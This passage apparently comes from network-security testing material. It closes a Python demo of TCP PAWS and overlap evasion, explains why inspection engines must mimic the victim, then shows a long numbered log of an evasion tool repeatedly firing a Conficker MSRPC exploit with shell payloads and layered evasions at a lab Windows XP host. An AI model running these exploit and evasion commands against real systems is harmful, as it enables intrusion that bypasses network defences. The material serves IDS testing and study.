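        print("  victim    (PAWS on,  first):", deliver(segs, ISN, TS0, True, "first"))
        print("  inspector (PAWS off, first):", deliver(segs, ISN, TS0, False, "first"))
        print("  inspector (PAWS off, last) :", deliver(segs, ISN, TS0, False, "last"))
    segs = overlap_evasion(payload, ISN, TS0)
    print("overlap, policy last :", deliver(segs, ISN, TS0, True, "last"))
    print("overlap, policy first:", deliver(segs, ISN, TS0, True, "first"))
```

Running it shows the asymmetry the evasion depends on: a PAWS-enforcing receiver reconstructs the payload regardless of decoy order or overlap policy, whereas a receiver without PAWS is poisoned by a decoy sent first if it favours first-seen bytes, and by a decoy sent last if it favours the newest bytes. An inspection engine therefore has to do both things the victim does, honour PAWS and use the victim's overlap policy, or it will inspect a stream the victim never sees.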
  2297. ...
  2298. 3870 runs averaging 1.91 runs / second ; progress: 2027/43200......
  2299. 3876 runs averaging 1.91 runs / second ; progress: 2032/43200.2015-06-07 23:53:22 INFO
  2300. Success. (10.62.90.118):
  2301. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62100 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=uZVoYbn3bLE --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_unspec|empty_keepalive|small_unspec|http_get|broken_length" --evasion=[smb_openpipe,end]tcp_paws,"8","102823530","random_alpha" --verifydelay=1000 --payload=shell
  2302. Info: Using random seed uZVoYbn3bLG
  2303. The following evasions are applied from stage smb_openpipe to end:
  2304. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 102823530> and has random alpha bytes as payload
  2305. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  2306.  
  2307. Info: NetBIOS connection 10.62.90.118:62100 -> 10.35.1.207:445
  2308. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2309. Info: Sending MSRPC request with exploit
  2310. Info: Shell found, attack succeeded
  2311. Info: Shell closed
  2312. 0: Success.
  2313. ............
  2314. 3890 runs averaging 1.91 runs / second ; progress: 2037/43200...............
  2315. 3905 runs averaging 1.91 runs / second ; progress: 2042/43200..........
  2316. 3915 runs averaging 1.91 runs / second ; progress: 2047/43200Pid 26530 timed out - killed
  2317. 2015-06-07 23:53:37 INFO
  2318. Timed out (10.62.90.119):
  2319. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45731 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=HlA8q8WZBQg --evasion=[msrpc_bind,end]msrpc_ndrflag,"char_unspec","float_vax","byte3_nonzero","byte4_nonzero" --evasion=[msrpc_bind,msrpc_req]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  2320. Info: Using random seed HlA8q8WZBQg
  2321. The following evasions are applied from stage smb_openpipe to end:
  2322. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  2323. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2324. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  2325. The following evasions are applied from stage msrpc_bind to end:
  2326. - MSRPC NDR flag is modified:
  2327. * Unspecified character encoding
  2328. * VAX floating point value encoding
  2329. * Reserved 3rd byte is set to a random non-zero value
  2330. * Reserved 4th byte is set to a random non-zero value
  2331.  
  2332.  
  2333. Info: NetBIOS connection 10.62.90.119:45731 -> 10.35.1.207:445
  2334. Terminated
  2335. .........
  2336. 3925 runs averaging 1.91 runs / second ; progress: 2052/43200..............
  2337. 3939 runs averaging 1.91 runs / second ; progress: 2057/43200.......
  2338. 3946 runs averaging 1.91 runs / second ; progress: 2062/43200
  2339. 3946 runs averaging 1.91 runs / second ; progress: 2067/43200
  2340. 3946 runs averaging 1.90 runs / second ; progress: 2072/43200.........
  2341. 3955 runs averaging 1.90 runs / second ; progress: 2077/43200.........
  2342. 3964 runs averaging 1.90 runs / second ; progress: 2082/43200.........2015-06-07 23:54:16 INFO
  2343. Success. (10.62.90.112):
  2344. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26191 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=CWCzNaZMK7E --evasion=[start,msrpc_bind]tcp_chaff,"3","chksum|nullflag|outofwindow|shorthdr|longhdr","random_alpha" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","212579014","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","alphanumrandomized" --verifydelay=1000 --payload=shell
  2345. Info: Using random seed CWCzNaZMK7E
  2346. The following evasions are applied from stage start to msrpc_bind:
  2347. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  2348. * Invalid TCP checksum.
  2349. * NULL TCP control flags.
  2350. * An out-of-window sequence number.
  2351. * TCP header shorter than 20 bytes
  2352. * TCP header longer than packet total size
  2353. * Duplicate packet has random alpha bytes as payload
  2354. The following evasions are applied from stage smb_connect to msrpc_req:
  2355. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 212579014> and has original payload with alphanumeric bytes randomized
  2356. The following evasions are applied from stage msrpc_bind to end:
  2357. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphanumeric bytes randomized
  2358.  
  2359. Info: NetBIOS connection 10.62.90.112:26191 -> 10.35.1.207:445
  2360. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2361. Info: Sending MSRPC request with exploit
  2362. Info: Shell found, attack succeeded
  2363. Info: Command shell connection reset.
  2364. Info: CommandShell::SendCommand() - Failed to send string
  2365. Info: Shell closed
  2366. 0: Success.
  2367. .
  2368. 3975 runs averaging 1.90 runs / second ; progress: 2087/43200...........
  2369. 3986 runs averaging 1.91 runs / second ; progress: 2092/43200..Pid 27448 timed out - killed
  2370. 2015-06-07 23:54:23 INFO
  2371. Timed out (10.62.90.114):
  2372. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63893 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TYsSONBPM0I --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"32" --evasion=[netbios_connect,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  2373. Info: Using random seed TYsSONBPM0J
  2374. The following evasions are applied from stage netbios_connect to msrpc_req:
  2375. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  2376. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2377. - IPv4 fragments with at most 32 bytes per fragment
  2378.  
  2379. Info: NetBIOS connection 10.62.90.114:63893 -> 10.35.1.207:445
  2380. Terminated
  2381. ..........
  2382. 3999 runs averaging 1.91 runs / second ; progress: 2097/43200............
  2383. 4011 runs averaging 1.91 runs / second ; progress: 2102/43200.................
  2384. 4028 runs averaging 1.91 runs / second ; progress: 2107/43200.............
  2385. 4041 runs averaging 1.91 runs / second ; progress: 2112/43200....
  2386. 4045 runs averaging 1.91 runs / second ; progress: 2117/43200
  2387. 4045 runs averaging 1.91 runs / second ; progress: 2122/43200...
  2388. 4048 runs averaging 1.90 runs / second ; progress: 2127/43200...............
  2389. 4063 runs averaging 1.91 runs / second ; progress: 2132/43200..........
  2390. 4073 runs averaging 1.91 runs / second ; progress: 2137/43200.2015-06-07 23:55:08 INFO
  2391. Success. (10.62.90.112):
  2392. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13755 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=UGUgfnLSS3I --evasion=[msrpc_req,end]smb_chaff,"3","write_flag","rand" --evasion=[msrpc_bind,msrpc_req]smb_writeandxpad,"10","zero" --evasion=[netbios_connect,end]tcp_paws,"25%","9","alpharandomized" --verifydelay=1000 --payload=shell
  2393. Info: Using random seed UGUgfnLSS3J
  2394. The following evasions are applied from stage netbios_connect to end:
  2395. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphabetic bytes randomized
  2396. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2397. - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  2398. The following evasions are applied from stage msrpc_req to end:
  2399. - Before every 3th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
  2400.  
  2401. Info: NetBIOS connection 10.62.90.112:13755 -> 10.35.1.207:445
  2402. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2403. Info: Sending MSRPC request with exploit
  2404. Info: Shell found, attack succeeded
  2405. Info: Shell closed
  2406. 0: Success.
  2407. ........
  2408. 4083 runs averaging 1.91 runs / second ; progress: 2142/43200.....
  2409. 4088 runs averaging 1.90 runs / second ; progress: 2147/43200.....
  2410. 4093 runs averaging 1.90 runs / second ; progress: 2152/43200......
  2411. 4099 runs averaging 1.90 runs / second ; progress: 2157/43200...........
  2412. 4110 runs averaging 1.90 runs / second ; progress: 2162/43200..Pid 28656 timed out - killed
  2413. 2015-06-07 23:55:34 INFO
  2414. Timed out (10.62.90.115):
  2415. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40200 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Psu0DJsbrY8 --evasion=[msrpc_bind,msrpc_req]tcp_chaff,"75%","chksum|nullchksum|nullflag|shorthdr","random" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  2416. Info: Using random seed Psu0DJsbrY8
  2417. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2418. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  2419. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2420. - 75% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
  2421. * Invalid TCP checksum.
  2422. * NULL TCP checksum.
  2423. * NULL TCP control flags.
  2424. * TCP header shorter than 20 bytes
  2425. * Duplicate packet has random bytes as payload
  2426.  
  2427. Info: NetBIOS connection 10.62.90.115:40200 -> 10.35.1.207:445
  2428. Terminated
  2429. ....2015-06-07 23:55:37 INFO
  2430. Success. (10.62.90.116):
  2431. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18364 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=0UFzFvAvo1k --evasion=[smb_connect,end]tcp_paws,"5","268435455","shuffle" --evasion=[smb_opentree,end]tcp_paws,"1","7","alphanumrandomized" --verifydelay=1000 --payload=shell
  2432. Info: Using random seed 0UFzFvAvo1n
  2433. The following evasions are applied from stage smb_connect to end:
  2434. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has shuffled original payload
  2435. The following evasions are applied from stage smb_opentree to end:
  2436. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphanumeric bytes randomized
  2437.  
  2438. Info: NetBIOS connection 10.62.90.116:18364 -> 10.35.1.207:445
  2439. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2440. Info: Sending MSRPC request with exploit
  2441. Info: Shell found, attack succeeded
  2442. Info: Shell closed
  2443. 0: Success.
  2444.  
  2445. 4118 runs averaging 1.90 runs / second ; progress: 2167/43200.........
  2446. 4127 runs averaging 1.90 runs / second ; progress: 2172/43200..............
  2447. 4141 runs averaging 1.90 runs / second ; progress: 2178/43200..Pid 28876 timed out - killed
  2448. 2015-06-07 23:55:48 INFO
  2449. Timed out (10.62.90.117):
  2450. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50364 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=Qd7YC0/440M --evasion=[start,netbios_connect]ipv4_opt,"2","inc","zero" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
  2451. Info: Using random seed Qd7YC0/440N
  2452. The following evasions are applied from stage start to netbios_connect:
  2453. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2454. The duplicate packet has NULL bytes for payload
  2455. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2456. - Add a random alphaurgent data byte to every 1 TCP segment.
  2457.  
  2458. Info: NetBIOS connection 10.62.90.117:50364 -> 10.35.1.207:445
  2459. Terminated
  2460. ........Pid 28942 timed out - killed
  2461. 2015-06-07 23:55:51 INFO
  2462. Timed out (10.62.90.111):
  2463. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57424 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=C0OcLkrMnfY --evasion=[start,end]ipv4_frag,"56" --evasion=[msrpc_bind,end]tcp_overlap,"717","new","zero" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2464. Info: Using random seed C0OcLkrMnfY
  2465. - IPv4 fragments with at most 56 bytes per fragment
  2466. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2467. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2468. The following evasions are applied from stage msrpc_bind to end:
  2469. - TCP segments are set to overlap by 717 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  2470.  
  2471. Info: NetBIOS connection 10.62.90.111:57424 -> 10.35.1.207:445
  2472. Terminated
  2473. .
  2474. 4154 runs averaging 1.90 runs / second ; progress: 2183/43200...........
  2475. 4165 runs averaging 1.90 runs / second ; progress: 2188/43200.2015-06-07 23:55:58 INFO
  2476. Success. (10.62.90.111):
  2477. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61300 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=IvJxSTiwIlk --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_connect,end]tcp_paws,"75%","268435453","shuffle" --verifydelay=1000 --payload=shell
  2478. Info: Using random seed IvJxSTiwIlk
  2479. The following evasions are applied from stage smb_connect to end:
  2480. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has shuffled original payload
  2481. The following evasions are applied from stage msrpc_bind to end:
  2482. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2483. The duplicate packet has shuffled TCP payload
  2484.  
  2485. Info: NetBIOS connection 10.62.90.111:61300 -> 10.35.1.207:445
  2486. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2487. Info: Sending MSRPC request with exploit
  2488. Info: Shell found, attack succeeded
  2489. Info: Shell closed
  2490. 0: Success.
  2491. ........
  2492. 4175 runs averaging 1.90 runs / second ; progress: 2193/43200.................
  2493. 4192 runs averaging 1.91 runs / second ; progress: 2198/43200.....................
  2494. 4213 runs averaging 1.91 runs / second ; progress: 2203/43200.........
  2495. 4222 runs averaging 1.91 runs / second ; progress: 2208/43200.....
  2496. 4227 runs averaging 1.91 runs / second ; progress: 2213/43200..2015-06-07 23:56:24 INFO
  2497. Success. (10.62.90.116):
  2498. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21077 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=r+UXSHT7fyw --evasion=[smb_connect,msrpc_bind]smb_chaff,"5","write_flag","zero" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","7","8","random_msrpcbind" --verifydelay=1000 --payload=shell
  2499. Info: Using random seed r+UXSHT7fyy
  2500. The following evasions are applied from stage smb_connect to msrpc_bind:
  2501. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  2502. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2503. - Before normal SMB writes, 7 SMB trees are opened and 7 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  2504.  
  2505. Info: NetBIOS connection 10.62.90.116:21077 -> 10.35.1.207:445
  2506. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2507. Info: Sending MSRPC request with exploit
  2508. Info: Shell found, attack succeeded
  2509. Info: CommandShell::SendCommand() - Failed to send string
  2510. Info: Command shell connection reset.
  2511. Info: Shell closed
  2512. 0: Success.
  2513. ........
  2514. 4238 runs averaging 1.91 runs / second ; progress: 2218/43200.....
  2515. 4243 runs averaging 1.91 runs / second ; progress: 2223/43200...........
  2516. 4254 runs averaging 1.91 runs / second ; progress: 2228/43200.....
  2517. 4259 runs averaging 1.91 runs / second ; progress: 2233/43200..................
  2518. 4277 runs averaging 1.91 runs / second ; progress: 2238/43200...............
  2519. 4292 runs averaging 1.91 runs / second ; progress: 2243/43200..........
  2520. 4302 runs averaging 1.91 runs / second ; progress: 2248/43200...........
  2521. 4313 runs averaging 1.91 runs / second ; progress: 2253/43200.............
  2522. 4326 runs averaging 1.92 runs / second ; progress: 2258/43200................
  2523. 4342 runs averaging 1.92 runs / second ; progress: 2263/43200.......
  2524. 4349 runs averaging 1.92 runs / second ; progress: 2268/43200....
  2525. 4353 runs averaging 1.92 runs / second ; progress: 2273/43200.........
  2526. 4362 runs averaging 1.91 runs / second ; progress: 2278/43200........
  2527. 4370 runs averaging 1.91 runs / second ; progress: 2283/432002015-06-07 23:57:33 INFO
  2528. Success. (10.62.90.115):
  2529. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55850 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=XzJN6u3j/GI --evasion=[start,smb_openpipe]ipv4_frag,"1464" --evasion=[start,smb_connect]ipv4_order,"lastfirst" --evasion=[netbios_connect,end]tcp_paws,"3","8","shuffle" --verifydelay=1000 --payload=shell
  2530. Info: Using random seed XzJN6u3j/GJ
  2531. The following evasions are applied from stage start to smb_openpipe:
  2532. - IPv4 fragments with at most 1464 bytes per fragment
  2533. The following evasions are applied from stage start to smb_connect:
  2534. - IPv4 fragments are sent in correct order except that the last fragment comes first
  2535. The following evasions are applied from stage netbios_connect to end:
  2536. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
  2537.  
  2538. Info: NetBIOS connection 10.62.90.115:55850 -> 10.35.1.207:445
  2539. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2540. Info: Sending MSRPC request with exploit
  2541. Info: Shell found, attack succeeded
  2542. Info: Shell closed
  2543. 0: Success.
  2544. .
  2545. 4372 runs averaging 1.91 runs / second ; progress: 2288/43200
  2546. 4372 runs averaging 1.91 runs / second ; progress: 2293/43200..
  2547. 4374 runs averaging 1.90 runs / second ; progress: 2298/43200.........
  2548. 4383 runs averaging 1.90 runs / second ; progress: 2303/43200Pid 30126 timed out - killed
  2549. 2015-06-07 23:57:54 INFO
  2550. Timed out (10.62.90.110):
  2551. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32027 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=wUBn/BV2FEU --evasion=[smb_connect,end]smb_chaff,"21","write_flag","zero" --evasion=[start,smb_connect]tcp_paws,"21","120695731","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  2552. Info: Using random seed wUBn/BV2FEX
  2553. The following evasions are applied from stage start to smb_connect:
  2554. - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 120695731> and has random alphanumeric bytes as payload
  2555. The following evasions are applied from stage smb_connect to end:
  2556. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  2557. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2558. - 75% probability to add a random urgent data byte to a TCP segment.
  2559.  
  2560. Info: NetBIOS connection 10.62.90.110:32027 -> 10.35.1.207:445
  2561. Terminated
  2562. .....
  2563. 4389 runs averaging 1.90 runs / second ; progress: 2308/43200....
  2564. 4393 runs averaging 1.90 runs / second ; progress: 2313/43200......
  2565. 4399 runs averaging 1.90 runs / second ; progress: 2318/43200.........
  2566. 4408 runs averaging 1.90 runs / second ; progress: 2323/43200....2015-06-07 23:58:17 INFO
  2567. Success. (10.62.90.116):
  2568. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34566 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Hhd5F+J7AnY --evasion=[smb_opentree,msrpc_bind]ipv4_frag,"832" --evasion=[msrpc_bind,end]smb_decoytrees,"6","1","7","random_msrpcreq" --verifydelay=1000 --payload=shell
  2569. Info: Using random seed Hhd5F+J7AnY
  2570. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2571. - IPv4 fragments with at most 832 bytes per fragment
  2572. The following evasions are applied from stage msrpc_bind to end:
  2573. - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  2574.  
  2575. Info: NetBIOS connection 10.62.90.116:34566 -> 10.35.1.207:445
  2576. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2577. Info: Sending MSRPC request with exploit
  2578. Info: Shell found, attack succeeded
  2579. Info: Command shell connection reset.
  2580. Info: CommandShell::SendCommand() - Failed to send string
  2581. Info: Shell closed
  2582. 0: Success.
  2583. ..
  2584. 4415 runs averaging 1.90 runs / second ; progress: 2328/43200.......
  2585. 4422 runs averaging 1.90 runs / second ; progress: 2333/43200..........
  2586. 4432 runs averaging 1.90 runs / second ; progress: 2338/43200............
  2587. 4444 runs averaging 1.90 runs / second ; progress: 2343/43200.........
  2588. 4453 runs averaging 1.90 runs / second ; progress: 2348/43200..........
  2589. 4463 runs averaging 1.90 runs / second ; progress: 2353/43200.......Pid 31109 timed out - killed
  2590. 2015-06-07 23:58:47 INFO
  2591. Timed out (10.62.90.113):
  2592. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37344 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=FvSgjVWqTCk --evasion=[netbios_connect,smb_openpipe]ipv4_frag,"48" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","6","shuffle" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  2593. Info: Using random seed FvSgjVWqTCk
  2594. The following evasions are applied from stage netbios_connect to smb_openpipe:
  2595. - IPv4 fragments with at most 48 bytes per fragment
  2596. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has shuffled original payload
  2597. The following evasions are applied from stage smb_opentree to msrpc_req:
  2598. - Add a random alphaurgent data byte to every 2 TCP segment.
  2599.  
  2600. Info: NetBIOS connection 10.62.90.113:37344 -> 10.35.1.207:445
  2601. Terminated
  2602. .......
  2603. 4478 runs averaging 1.90 runs / second ; progress: 2358/43200......Pid 31179 timed out - killed
  2604. 2015-06-07 23:58:50 INFO
  2605. Timed out (10.62.90.119):
  2606. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=19295 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=Kz3v1sEnRX8 --evasion=[smb_connect,msrpc_req]tcp_segvar,"6","62790" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2607. Info: Using random seed Kz3v1sEnRX8
  2608. The following evasions are applied from stage smb_connect to msrpc_req:
  2609. - TCP packets are segmented to contain between 6 and 62790 bytes of payload.
  2610. The following evasions are applied from stage smb_opentree to end:
  2611. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2612.  
  2613. Info: NetBIOS connection 10.62.90.119:19295 -> 10.35.1.207:445
  2614. Terminated
  2615. ..................
  2616. 4503 runs averaging 1.91 runs / second ; progress: 2363/43200............
  2617. 4515 runs averaging 1.91 runs / second ; progress: 2369/43200......
  2618. 4521 runs averaging 1.90 runs / second ; progress: 2374/43200......
  2619. 4527 runs averaging 1.90 runs / second ; progress: 2379/43200.............2015-06-07 23:59:12 INFO
  2620. Success. (10.62.90.110):
  2621. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30148 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=jbJwefC+liw --evasion=[netbios_connect,smb_connect]ipv4_opt,"3","inc","shuffletcp" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","8","shuffle" --verifydelay=1000 --payload=shell
  2622. Info: Using random seed jbJwefC+liy
  2623. The following evasions are applied from stage netbios_connect to smb_connect:
  2624. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  2625. The duplicate packet has shuffled TCP payload
  2626. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2627. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has shuffled original payload
  2628.  
  2629. Info: NetBIOS connection 10.62.90.110:30148 -> 10.35.1.207:445
  2630. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2631. Info: Sending MSRPC request with exploit
  2632. Info: Shell found, attack succeeded
  2633. Info: Shell closed
  2634. 0: Success.
  2635. ...
  2636. 4544 runs averaging 1.91 runs / second ; progress: 2384/43200........2015-06-07 23:59:17 INFO
  2637. Success. (10.62.90.113):
  2638. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63960 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=j+EzmmWE6BM --evasion=[smb_opentree,end]tcp_paws,"25%","9","random" --evasion=[msrpc_bind,msrpc_req]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
  2639. Info: Using random seed j+EzmmWE6BO
  2640. The following evasions are applied from stage smb_opentree to end:
  2641. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random bytes as payload
  2642. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2643. - Add a random alphaurgent data byte to every 13 TCP segment.
  2644.  
  2645. Info: NetBIOS connection 10.62.90.113:63960 -> 10.35.1.207:445
  2646. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2647. Info: Sending MSRPC request with exploit
  2648. Info: Shell found, attack succeeded
  2649. Info: Shell closed
  2650. 0: Success.
  2651. ....
  2652. 4557 runs averaging 1.91 runs / second ; progress: 2389/43200.........
  2653. 4566 runs averaging 1.91 runs / second ; progress: 2394/43200.................
  2654. 4583 runs averaging 1.91 runs / second ; progress: 2399/432002015-06-07 23:59:29 INFO
  2655. Success. (10.62.90.115):
  2656. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18737 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o6dhAFDy5Zs --evasion=[smb_connect,end]smb_decoytrees,"5","6","2","random_msrpcreq" --evasion=[start,end]tcp_inittsopt,"enable","zero" --verifydelay=1000 --payload=shell
  2657. Info: Using random seed o6dhAFDy5Zu
  2658. - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
  2659. The following evasions are applied from stage smb_connect to end:
  2660. - Before normal SMB writes, 5 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  2661.  
